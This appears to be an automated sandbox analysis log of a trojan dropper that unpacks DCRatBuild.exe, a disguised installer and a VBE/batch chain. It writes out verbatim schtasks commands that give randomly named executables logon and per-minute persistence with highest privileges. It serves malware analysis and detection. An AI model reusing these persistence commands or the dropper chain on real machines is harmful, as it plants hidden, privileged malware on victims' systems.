                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B02CFC435_2_00007FFD9B02CFC4
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B01D87335_2_00007FFD9B01D873
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B027C1535_2_00007FFD9B027C15
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B027C3335_2_00007FFD9B027C33
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B05A18C35_2_00007FFD9B05A18C
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B06A4C835_2_00007FFD9B06A4C8
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B010DB435_2_00007FFD9B010DB4
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B000DB436_2_00007FFD9B000DB4
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1C4BE036_2_00007FFD9B1C4BE0
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1C3BF336_2_00007FFD9B1C3BF3
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1B03F236_2_00007FFD9B1B03F2
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1B043836_2_00007FFD9B1B0438
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1C52E736_2_00007FFD9B1C52E7
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1C4FF336_2_00007FFD9B1C4FF3
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1C585A36_2_00007FFD9B1C585A
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1C4DF236_2_00007FFD9B1C4DF2
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B1B0D0D36_2_00007FFD9B1B0D0D
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B8F727636_2_00007FFD9B8F7276
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B8FB95436_2_00007FFD9B8FB954
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B9010AD36_2_00007FFD9B9010AD
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 36_2_00007FFD9B8FBAB836_2_00007FFD9B8FBAB8
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 37_2_00007FFD9B030DB437_2_00007FFD9B030DB4
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll 42E4BA85C71A2C275D4682E3D137CEB5B1B9993541191176E71B2C9E98AE496D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: String function: 0084A720 appears 51 times
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: String function: 00849660 appears 224 times
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: String function: 008481D0 appears 55 times
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: String function: 0084A190 appears 49 times
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 004AEC50 appears 56 times
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 004AF5F0 appears 31 times
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 004AEB78 appears 39 times
                                    Source: gorkmTnChA.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                    Source: gorkmTnChA.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                    Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSandeLLoCHECKER_Installer.exeB vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNDP48-Web.exeZ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBoxStub.exeT vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1661883105.0000000003F8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSandeLLoCHECKER_Installer.exeB vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1661883105.0000000003F8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNDP48-Web.exeZ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1661883105.0000000003F8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBoxStub.exeT vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFileNameSandeLLoCHECKER_Installer.exeB vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFilenameNDP48-Web.exeZ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFilenameBoxStub.exeT vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@46/102@1/2
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_00496C74 GetLastError,FormatMessageW,1_2_00496C74
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00992D90 GetDiskFreeSpaceExW,3_2_00992D90
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009AAE10 CoCreateInstance,3_2_009AAE10
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_004AA6C2
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exeJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\yYksYVbT.logJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMutant created: \Sessions\1\BaseNamedObjects\Local\4ea4b9242e059cec7c8f71f08c454db16c298bd3e44de5a4ee8c3ef811c40795
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeFile created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxname1_2_004ADF1E
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxstime1_2_004ADF1E
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: STARTDLG1_2_004ADF1E
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: xzN1_2_004ADF1E
                                    Source: gorkmTnChA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2898761896.000000000346F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT `FileName`, `MinVersion`, `MaxVersion`, `MinSize` , `MaxSize`, `MinDate`, `MaxDate`, `Languages` FROM `Signature` WHERE `Signature` = ?;
                                    Source: gorkmTnChA.exeReversingLabs: Detection: 100%
                                    Source: unknownProcess created: C:\Users\user\Desktop\gorkmTnChA.exe "C:\Users\user\Desktop\gorkmTnChA.exe"
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe"
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeProcess created: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe"
                                    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 26CF464DBA35F416758053A43B23FD3D C
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)"
                                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7BC9C83AA604E4F7E55BC37E42BF8976 C
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe "C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 8 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 10 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeProcess created: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)"Jump to behavior
                                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 26CF464DBA35F416758053A43B23FD3D CJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7BC9C83AA604E4F7E55BC37E42BF8976 CJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe "C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"Jump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: shfolder.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: uxtheme.dllJump to behavior
